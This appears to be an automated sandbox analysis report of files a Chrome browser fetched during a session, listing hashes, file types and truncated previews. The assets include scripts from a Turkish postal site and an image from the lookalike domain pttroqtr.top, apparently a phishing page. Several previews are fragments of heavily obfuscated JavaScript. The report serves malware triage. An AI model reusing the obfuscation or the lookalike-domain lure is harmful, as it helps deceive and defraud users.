                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/js/linkify.min.js
                                                                                                                                                                                            Preview:if(!window.ACJS){window.ACJS={};}window.ACJS.linkify=function(u){"use strict";var e="aaa aarp abarth abb abbott abbvie abc able abogado abudhabi ac academy accenture accountant accountants aco actor ad adac ads adult ae aeg aero aetna af afl africa ag agakhan agency ai aig airbus airforce airtel akdn al alfaromeo alibaba alipay allfinanz allstate ally alsace alstom am amazon americanexpress americanfamily amex amfam amica amsterdam analytics android anquan anz ao aol apartments app apple aq aquarelle ar arab aramco archi army arpa art arte as asda asia associates at athleta attorney au auction audi audible audio auspost author auto autos avianca aw aws ax axa az azure ba baby baidu banamex bananarepublic band bank bar barcelona barclaycard barclays barefoot bargains baseball basketball bauhaus bayern bb bbc bbt bbva bcg bcn bd be beats beauty beer bentley berlin best bestbuy bet bf bg bh bharti bi bible bid bike bing bingo bio biz bj black blackfriday blockbuster blog bloomberg blue bm
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):11236
                                                                                                                                                                                            Entropy (8bit):7.782737264318003
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:ZK9RLFVUR7LSdHxVoigH9+RwfTKOJsP/E+UpeiT3oCYvwAPYG9V+RMBM8T:WRLPUUjVoigawfWOGxwJ4CYv3PiCGu
                                                                                                                                                                                            MD5:FF5BD3D7849B187DEC777004626B58FF
                                                                                                                                                                                            SHA1:4F7FDA5D6D9E8D07E6F8485872FD962007DCF139
                                                                                                                                                                                            SHA-256:CE97846C74192E04D8DF79782636ADDEC31439985A7278317635E7777F365667
                                                                                                                                                                                            SHA-512:28555EB25B6F46D8623E1338DAD84E431BA354A1B5A1750E6D3FE86FDDCF78D28C3CDD026BF6F30A8DE4585657453E070F6068A8A6654A0CE5EE34BADF3E12A9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..+qIDATx...MV........g.&#.to.y.&.4-..d.QF`<...........F...5#....e.HU{..J<.ZZ.9.Q....?}.....`\.8...B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ....q...q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B...B........7T....Z....../.r.Z9.?gu....?.'..x.......L...<..X.|.m...}.}>.?.k~.,..z..:.8.{}n.._...s......%..i].\..}.i.V..k.Y..].....~>[...._....L........xU...O..|W....p{.!.|@..y.@.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 2256 x 870, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):68762
                                                                                                                                                                                            Entropy (8bit):7.71915786162258
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:rngMJBc2rGBNTitP9UVe6NdNXdhEr7Fv8p3Q3eWm:EmtrGbTKuD9Xda7yp3Iel
                                                                                                                                                                                            MD5:C61C112D676A67063CD88EAB7CCD45C0
                                                                                                                                                                                            SHA1:C242C80410CDA356C2DE2D4E0D23E854CC4DACBD
                                                                                                                                                                                            SHA-256:AC2B764B80CF484BDFC9BECBE35E90C2FFF150BBAE34DC45532C0C74A293EFF4
                                                                                                                                                                                            SHA-512:0200342B2A4E4484EDA42EC36BBBBB21E678322AAB9015CFEB54A41888F3AA6AD71423F9228CBCC1FD4155453E1BBDF5788F94CA8D78E33AFCCE400681FEE906
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR.......f.....1.......tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:C717A9C144ADE311B375B81E1EEB5B96" xmpMM:DocumentID="xmp.did:66A006C7B8FE11E488B09FFF33422EA0" xmpMM:InstanceID="xmp.iid:66A006C6B8FE11E488B09FFF33422EA0" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2B90E4DDBAB7E4118702D694C2DD9BC9" stRef:documentID="xmp.did:C717A9C144ADE311B375B81E1EEB5B96"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>%..u....IDATx.....\gy6.w.$..d,l.M.M...M.....!..0.B
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                            Entropy (8bit):4.251130351888073
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:t9LylyxETgF0Kq7mgctL++X8UEIZDXzdB+rH:2lPTgF0Kq7mggH8UZ7YH
                                                                                                                                                                                            MD5:9090C370EF1DD7BBF36DF3798544DB2B
                                                                                                                                                                                            SHA1:A10781354CECA73AA753B38711C44C8256CEF934
                                                                                                                                                                                            SHA-256:7B4D3164246248283743096A9DAECF1178F07DF98F2EECBCD698208CD81CF2CD
                                                                                                                                                                                            SHA-512:B8F3A64026602230E92FDEC3FF914D552729FC9FA107635E6161A1CCAC090E02E87A4A99ADE4432FE23BF680165407715C717AFDE663D2A83486D945315F569A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/img/microphone_close.svg
                                                                                                                                                                                            Preview:<svg height="511pt" viewBox="-90 1 511 511.99899" style="fill:#b7b7b7;" width="511pt" xmlns="http://www.w3.org/2000/svg"><path d="m332.464844 275.082031c0-8.429687-6.835938-15.265625-15.269532-15.265625-8.433593 0-15.269531 6.835938-15.269531 15.265625 0 74.6875-60.757812 135.445313-135.445312 135.445313-74.683594 0-135.441407-60.757813-135.441407-135.445313 0-8.429687-6.835937-15.265625-15.269531-15.265625-8.433593 0-15.269531 6.835938-15.269531 15.265625 0 86.378907 66.320312 157.539063 150.710938 165.273438v41.105469h-56.664063c-8.433594 0-15.269531 6.835937-15.269531 15.269531 0 8.433593 6.835937 15.269531 15.269531 15.269531h143.871094c8.429687 0 15.265625-6.835938 15.265625-15.269531 0-8.433594-6.835938-15.269531-15.265625-15.269531h-56.667969v-41.105469c84.394531-7.730469 150.714844-78.894531 150.714844-165.273438zm0 0"/><path d="m166.480469 372.851562c53.910156 0 97.769531-43.859374 97.769531-97.769531v-177.316406c0-53.90625-43.859375-97.765625-97.769531-97.765625-53.90625 0-97
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):96
                                                                                                                                                                                            Entropy (8bit):4.801770503303253
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:k0WYL12AdneHBeBW6QfpX/W6Qen:UYR2AdeHBf6EpXO6h
                                                                                                                                                                                            MD5:21C1349F80499EC49848EA61EDFCC3AB
                                                                                                                                                                                            SHA1:CED7488DB5B6CF88DACE2E0AE2C668C0B2D4ACE2
                                                                                                                                                                                            SHA-256:A0676D8033F5A45F08B37BB7EA756D48C584DF74246E167DBDF5D020B2A0B4B1
                                                                                                                                                                                            SHA-512:625427E44A07B5FB3FE892A2CD8F2B78303D25BDC5581049FE71B1BDE19DF2C46DCF39176AE634FF6FF1A04061601817A872DA122997FD3F048D335EE0448808
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:self.__SSG_MANIFEST=new Set(["\u002Fnotfound"]);self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB()
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                            Entropy (8bit):4.180365114215879
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4086)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4139
                                                                                                                                                                                            Entropy (8bit):5.396169414887138
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:MxxRw7sQE5qZ1WjOaeUgm6AVt1VPe69ubUzo9nx:6xr5UefoABUdUzunx
                                                                                                                                                                                            MD5:94C8ECC84AD96FF2F711474D44C3F302
                                                                                                                                                                                            SHA1:9D8B81EE6BE85E30F301D243F388A69970CC9AD1
                                                                                                                                                                                            SHA-256:F3E1DE4C82509C765893A33967FCF40DF693F133C7C97F2E6D975A076DA532FA
                                                                                                                                                                                            SHA-512:FDFE22F9469C5A772A9980B1563C6FF33BEB00F04D005257DD922D56D12C64BF5986E939B9EA8D9E3747466534EA6BAE64193911666DEF5E94AD19C72A7EBA3E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/chunks/webpack-45e080b2c6cac5da.js
                                                                                                                                                                                            Preview:!function(){"use strict";var e={},t={};function n(r){var o=t[r];if(void 0!==o)return o.exports;var u=t[r]={exports:{}},i=!0;try{e[r].call(u.exports,u,u.exports,n),i=!1}finally{i&&delete t[r]}return u.exports}n.m=e,function(){var e=[];n.O=function(t,r,o,u){if(!r){var i=1/0;for(d=0;d<e.length;d++){r=e[d][0],o=e[d][1],u=e[d][2];for(var f=!0,c=0;c<r.length;c++)(!1&u||i>=u)&&Object.keys(n.O).every((function(e){return n.O[e](r[c])}))?r.splice(c--,1):(f=!1,u<i&&(i=u));if(f){e.splice(d--,1);var a=o();void 0!==a&&(t=a)}}return t}u=u||0;for(var d=e.length;d>0&&e[d-1][2]>u;d--)e[d]=e[d-1];e[d]=[r,o,u]}}(),n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},function(){var e,t=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__};n.t=function(r,o){if(1&o&&(r=this(r)),8&o)return r;if("object"===typeof r&&r){if(4&o&&r.__esModule)return r;if(16&o&&"function"===typeof r.then)return r}var u=Object.cre
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                            Entropy (8bit):4.180365114215879
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (6570)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):6622
                                                                                                                                                                                            Entropy (8bit):5.441018560135766
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:WZc9BoTZ1QMX8mSypSLXQq6RhFXhLghvEh1IZ:cc72Mp3ycLX3Oz6S0
                                                                                                                                                                                            MD5:576111A3EE04000D9CA3BD40B3333866
                                                                                                                                                                                            SHA1:F131EA58893190DD12255EAC56E7F848CB712386
                                                                                                                                                                                            SHA-256:80D723D2E5C52594EDEA4CD4A9147C42931C9A6253D0725EF597383703197F78
                                                                                                                                                                                            SHA-512:50400A8D613F112C385844DFD269FADF138248DBF6482A60B874FB287EC7D659080DCC88F7F411EDD28E55879F63CA170184F198886B9C5EE6D10AC5304D5E32
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/chunks/pages/%5Bslug%5D-88e5a3b326ec670d.js
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6219],{5332:function(e,n,l){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[slug]",function(){return l(797)}])},3846:function(e,n,l){"use strict";var s,t=l(3288),u=l(6830),a=l.n(u),r=l(1395),c=l(2466),o=l(3230),i=l(3395),d=l(6731),_=l.n(d);n.Z=function(e){var n=e.menu,l=e.menus,u=(0,r.useRouter)(),d=(0,c.useRef)(),g=function(e){return!(0,o.lF)(l.filter((function(n){return n.parentMenuId===e}))[0])&&(0,t.jsx)("ul",{className:"".concat(a().menu),children:l&&l.filter((function(n){return n.parentMenuId===e&&!(0,o.lF)(n.languageResources)})).map((function(e){return(0,t.jsxs)("li",{"data-id":(0,o.fI)(e.languageResources,i.rD.MENU).slug,children:[e.url!==i.H_.PAGE_NO_ACTION?(0,t.jsx)(_(),{href:"".concat((0,o.lF)(e.url)||e.url==i.H_.PAGE?"/".concat((0,o.fI)(e.languageResources,i.rD.MENU).slug):e.url),children:(0,t.jsx)("a",{children:(0,o.fI)(e.languageResources,i.rD.MENU).value})}):(0,t.jsxs)(t.Fragment,{children:[(0,o.fI)(e.languageResou
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1892), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1892
                                                                                                                                                                                            Entropy (8bit):5.3199265720505045
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:9MxFGgXen1yVqPNzTOv+Pgdxj2zRxpUky6fRK2:9MPGgYyV8NrgdV29vUkVfRK2
                                                                                                                                                                                            MD5:BD7525226CFF3D63880AB3E3783107C4
                                                                                                                                                                                            SHA1:B69F85592A127F736AD8B04F0DBB378295463C85
                                                                                                                                                                                            SHA-256:81F05B60B2139D0F055A533BDEED2E2BC3E6142A9E779A0C644455F1BBF3F9C1
                                                                                                                                                                                            SHA-512:9D33EACA3352F03C946DF20AEBA8ECB5430A0881A0150748E3C217400CD965FEE7F379D0D21FEA110BCE7EC43BE8BBD0230A2239EA453175C8900752B1B6FBA9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:function a24_0x5346(_0x4030c5,_0x31eecd){const _0x556825=a24_0x324b();return a24_0x5346=function(_0x3b0de7,_0xce0cb2){_0x3b0de7=_0x3b0de7-0x67;let _0x324bdb=_0x556825[_0x3b0de7];return _0x324bdb;},a24_0x5346(_0x4030c5,_0x31eecd);}function a24_0x324b(){const _0xb022b5=['1002222jJEtDH','toString','254AqdTdL','__vccOpts','5ToDzfk','1085710vVxwgb','528906UwedBM','search','constructo','54xBZeip','10320728oLohLb','353TqOCxG','(((.+)+)+)','2031164WFthFE','8CvfsLG','226828xuWwpQ'];a24_0x324b=function(){return _0xb022b5;};return a24_0x324b();}(function(_0x2907ff,_0x1577d4){const _0x4680c9=a24_0x5346,_0x3fc7cd=_0x2907ff();while(!![]){try{const _0x4b2c9c=parseInt(_0x4680c9(0x6b))/0x1*(-parseInt(_0x4680c9(0x72))/0x2)+parseInt(_0x4680c9(0x76))/0x3+-parseInt(_0x4680c9(0x6d))/0x4*(parseInt(_0x4680c9(0x74))/0x5)+parseInt(_0x4680c9(0x69))/0x6*(-parseInt(_0x4680c9(0x6f))/0x7)+parseInt(_0x4680c9(0x6e))/0x8*(parseInt(_0x4680c9(0x70))/0x9)+-parseInt(_0x4680c9(0x75))/0xa+parseInt(_0x4680c9(0x6a))/0xb;if(_0x
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (59842), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):115111
                                                                                                                                                                                            Entropy (8bit):5.535367167236125
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:idizI7WC3KXhmbMCuGIwduyEoJgxXWH0XtJhjp975cHrYrgn3ZeE+FLY24eAGx:BQzTbTdBdriTh7752NDu
                                                                                                                                                                                            MD5:5634919A771FA502E0CD602659B9EE3E
                                                                                                                                                                                            SHA1:5CF5D399FFDD13D5425DE9C4B290909E3E6219FB
                                                                                                                                                                                            SHA-256:4991B8E3F096D97A1ED0B4D6767E093DED9F95DB1664C7842807ED13699654CA
                                                                                                                                                                                            SHA-512:1FF880E61F2A17CDB0FEBE95E60229661CE8426C2B07C883CB02DD8CE21EF91DF6E62307D138CFAA7B91FA8C129FD303D12FF4B7F5EF61692E6BD3EE8F3704A4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:var a2_0x49024d=a2_0x20dc;(function(_0x339814,_0x1d1181){var _0x457781=a2_0x20dc,_0x2f5f94=_0x339814();while(!![]){try{var _0x876046=parseInt(_0x457781(0x415))/0x1*(parseInt(_0x457781(0x42a))/0x2)+parseInt(_0x457781(0x6e7))/0x3*(parseInt(_0x457781(0x3e2))/0x4)+parseInt(_0x457781(0x56c))/0x5*(parseInt(_0x457781(0x436))/0x6)+-parseInt(_0x457781(0x29d))/0x7*(-parseInt(_0x457781(0x4b3))/0x8)+-parseInt(_0x457781(0x601))/0x9*(parseInt(_0x457781(0x522))/0xa)+parseInt(_0x457781(0x4d2))/0xb+-parseInt(_0x457781(0x2b4))/0xc;if(_0x876046===_0x1d1181)break;else _0x2f5f94['push'](_0x2f5f94['shift']());}catch(_0x13a41e){_0x2f5f94['push'](_0x2f5f94['shift']());}}}(a2_0x249c,0xe51e5));var a2_0x1c7adf=(function(){var _0x1ca7ef=!![];return function(_0x448b2e,_0x3b2af0){var _0x1ee66c=_0x1ca7ef?function(){var _0x281dcb=a2_0x20dc;if(_0x3b2af0){var _0x26480f=_0x3b2af0[_0x281dcb(0x51d)](_0x448b2e,arguments);return _0x3b2af0=null,_0x26480f;}}:function(){};return _0x1ca7ef=![],_0x1ee66c;};}()),a2_0x5e5ab1=a2_0x
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (4650), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4708
                                                                                                                                                                                            Entropy (8bit):5.24982094326148
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:LhLALv2dQ13a19GeEc2mvDjHqiqV8SYn1u7+eNEgyJY47186ee7f1lV:xz5Ec1vfqiqVg1u7+eyPY47186ee7f1D
                                                                                                                                                                                            MD5:0DA2A6E8828A9D4461A27CC813A21CD1
                                                                                                                                                                                            SHA1:32727963FEC3E91E3951E0551ABA8AC7F45FC89D
                                                                                                                                                                                            SHA-256:8A87A08F2C1C9AE855AACA4BD6F26B5DE44F28EA9810039F93333CC8E59FD166
                                                                                                                                                                                            SHA-512:4F6E559C68F275E9C2F2C3C8D04392049C75856279387E74EEF2BD791DE653A81231C8B08BF86C712C905CD2C603A5298B092BCA2F7A29092AD8CD1E1F35FDA1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:const a16_0x1a0ab1=a16_0xb309;(function(_0xc62027,_0x4c3503){const _0x472517=a16_0xb309,_0x18f288=_0xc62027();while(!![]){try{const _0x10a64b=parseInt(_0x472517(0x14b))/0x1+-parseInt(_0x472517(0x13f))/0x2+parseInt(_0x472517(0x12d))/0x3+-parseInt(_0x472517(0x12a))/0x4*(parseInt(_0x472517(0x145))/0x5)+parseInt(_0x472517(0x129))/0x6*(parseInt(_0x472517(0x144))/0x7)+-parseInt(_0x472517(0x12e))/0x8*(parseInt(_0x472517(0x141))/0x9)+parseInt(_0x472517(0x132))/0xa;if(_0x10a64b===_0x4c3503)break;else _0x18f288['push'](_0x18f288['shift']());}catch(_0x2102de){_0x18f288['push'](_0x18f288['shift']());}}}(a16_0x4681,0x6ebf6));const a16_0xaa59f7=(function(){let _0x410bd1=!![];return function(_0x3e5c07,_0x31cc45){const _0x5c21e7=_0x410bd1?function(){const _0x3aa6a6=a16_0xb309;if(_0x31cc45){const _0x21f428=_0x31cc45[_0x3aa6a6(0x124)](_0x3e5c07,arguments);return _0x31cc45=null,_0x21f428;}}:function(){};return _0x410bd1=![],_0x5c21e7;};}()),a16_0x8c9795=a16_0xaa59f7(this,function(){const _0x3aa272=a16_0x
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):44008
                                                                                                                                                                                            Entropy (8bit):7.959695770661982
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:jich1+kvACQ6+XRoonVs3sruEET2QAqHDBucmp7aaDkkNRWGKPRkU+:FE6+B9OsrlEonfaaDDRWGKPRkU+
                                                                                                                                                                                            MD5:F29E09E7EB1220F3B89EB5F7C6E70C0F
                                                                                                                                                                                            SHA1:EFE3BD42DD2920662239EE8A7915B1AB4A030A1C
                                                                                                                                                                                            SHA-256:72F4F765EE364C8CABDDC25B48E28DB60BF229B3807EF78BEE1127F9AD157AD7
                                                                                                                                                                                            SHA-512:B4E600B9BA6918BF68524BF3CFE9103B931C1EAAE92F94A3B57E3CF57DDD692831BAACE501A96B971948A12162E1A6BF26460E40B2661E5B1D4F602BAE4BC158
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...uIDATx....de.....s........A`...J....pUt..kB.........l..I..HN.0..0......U]9.......{zf:Tw.g>5.....:.=.Ur....a..a......0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0....1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0.S)<U.Z#..T..s%..V...v..S..1.......!q.P.......!qJ...5....0,q..0*O....j....y..l..$gz1S.I)+lE.....w{...N.4~.A....n.Qq.aq......$.0,q..,va#A.b..V,k..)%b......e..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (32023)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):83612
                                                                                                                                                                                            Entropy (8bit):5.277084099045577
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:knWi6p4BmVLFijGb2gXke71t5tgPBHlxNLIJBanUEwf7rmvsMn3lhMr:0UL5uxNL/4Cr3lOr
                                                                                                                                                                                            MD5:0A6E846B954E345951E710CD6CE3440E
                                                                                                                                                                                            SHA1:FBF9C77D0C4E3C34A485980C1E5316B6212160C8
                                                                                                                                                                                            SHA-256:B13CB5989E08FCB02314209D101E1102F3D299109BDC253B62AA1DA21C9E38BA
                                                                                                                                                                                            SHA-512:14653AADEB13635FF6F108137200DE430033050660B6F33B36DD15E92C10D1042FABCC8D08836374769AA8B2FE080DCDF038B8145D803F40167F54D8825AA321
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/*! jQuery v2.0.3 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery-2.0.3.min.map.*/.(function(e,undefined){var t,n,r=typeof undefined,i=e.location,o=e.document,s=o.documentElement,a=e.jQuery,u=e.$,l={},c=[],p="2.0.3",f=c.concat,h=c.push,d=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,x=function(e,n){return new x.fn.init(e,n,t)},b=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^-ms-/,N=/-([\da-z])/gi,E=function(e,t){return t.toUpperCase()},S=function(){o.removeEventListener("DOMContentLoaded",S,!1),e.removeEventListener("load",S,!1),x.ready()};x.fn=x.prototype={jquery:p,constructor:x,init:function(e,t,n){var r,i;if(!e)return this;if("string"==typeof e){if(r="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:T.exec(e),!r||!r[1]&&t)return!t||t.jquery?(t||n).find(e):this.constructor(t).find(e);if(r[1]){if(t=t instanceof x?t[0]:t,x.me
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):11236
                                                                                                                                                                                            Entropy (8bit):7.810773514354199
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:kMT1s9HGoPMx5pkNj2lCMRzf9vtAfvdaVyQkVdabDaV2QqgOr/NE6kMy52E+lgBK:r1OHw3pm2lCacvdaDk6CcWOYMy5D+GBK
                                                                                                                                                                                            MD5:B2CB0F3916850DCD4056B9D6336FD78A
                                                                                                                                                                                            SHA1:76F040631FE153456638BC65E459A184DE09FE53
                                                                                                                                                                                            SHA-256:C947614A8D15810CF1B6768C16458C002E3D65640BF2B415BC1E23DA049CBEFD
                                                                                                                                                                                            SHA-512:A9FA0D82D0E753F3BD767568B3D6EF135F41C9D919C5361F5CA69BE157B76E7CE9473355397CD0E92157E7A338D06B35D08AF4BF21B045B0BAEDB2D22A33CD5B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/38.png
